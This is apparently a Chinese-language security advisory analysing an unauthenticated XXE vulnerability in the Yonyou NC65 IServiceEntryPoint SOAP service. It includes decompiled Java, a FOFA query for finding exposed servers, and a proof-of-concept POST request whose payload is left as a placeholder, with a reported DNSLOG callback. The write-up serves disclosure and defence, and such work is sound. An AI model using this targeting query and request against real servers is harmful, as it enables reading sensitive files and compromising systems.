漏洞简介
⽤友NC IServiceEntryPoint 接⼝处存在XXE漏洞,未授权的攻击者可以通过此漏洞读取服务器上敏感⽂件,进 ⼀步利⽤可导致服务器失陷。
影响版本
NC65
fofa语法
app="⽤友-UFIDA-NC"
漏洞分析
看下 IServiceEntryPoint 的业务逻辑
package nc.uap.oba.word.webservice;
import nc.bs.framework.common.UserExit;
import nc.uap.oba.Serializer;
import nc.uap.oba.word.webservice.entity.BusinessResult;
import nc.uap.oba.word.webservice.entity.RequestInfo;
import nc.uap.oba.word.webservice.entity.ResponseService;
import nc.uap.oba.word.webservice.handler.CustomServiceHandler;
import nc.uap.oba.word.webservice.handler.ReqServiceHandler;
public class ServiceEntryPointImpl implements IServiceEntryPoint {
public ServiceEntryPointImpl() {
}
public String getResult(String data) {
BusinessResult result = new BusinessResult();
result.setSuccessful(false);
String message = null;
try {
RequestInfo reqInfo = (RequestInfo)Serializer.deserialize(data, RequestInfo.class);
UserExit.getInstance().setUserDataSource(reqInfo.getDsName());
message = reqInfo.getName();
getResult 方法直接将 data 带入 Serializer.deserialize 方法中,看下其实现逻辑
package nc.uap.oba;
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.Marshaller;
import javax.xml.bind.Unmarshaller;
import javax.xml.transform.stream.StreamSource;
public class Serializer {
public Serializer() {
}
public static String serialize(Object value) throws Exception {
StringWriter writer = new StringWriter();
JAXBContext jaxbContext = JAXBContext.newInstance(new Class[]{value.getClass()});
Marshaller marshaller = jaxbContext.createMarshaller();
marshaller.marshal(value, writer);
return writer.getBuffer().toString();
}
public static <T> T deserialize(String xml, Class<?> type) throws Exception {
JAXBContext jaxbContext = JAXBContext.newInstance(new Class[]{type});
StreamSource streamSouce = new StreamSource(new StringReader(xml));
Unmarshaller unmarshaller = jaxbContext.createUnmarshaller();
return (T)unmarshaller.unmarshal(streamSouce);
}
}
deserialize 方法里直接使用 javax.xml.bind.Unmarshaller 对 xml 内容进行操作,而JAXB的Unmarshaller默认启用外部实体解析功能,未对XML输入中的实体引用进行限制,造成XXE漏洞。
漏洞复现
漏洞测试
POST /uapws/service/nc.uap.oba.word.webservice.IServiceEntryPoint HTTP/1.1
Host: nc.mrxn.net
Content-Type: text/xml;charset=UTF-8
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iser="http://webservice.word.oba.uap.nc/IServiceEntryPoint">
<soapenv:Header/>
<soapenv:Body>
<iser:getResult>
<!--type: string-->
<iser:string>XXE POC</iser:string>
</iser:getResult>
</soapenv:Body>
</soapenv:Envelope>
DNSLOG 平台成功收到HTTP请求



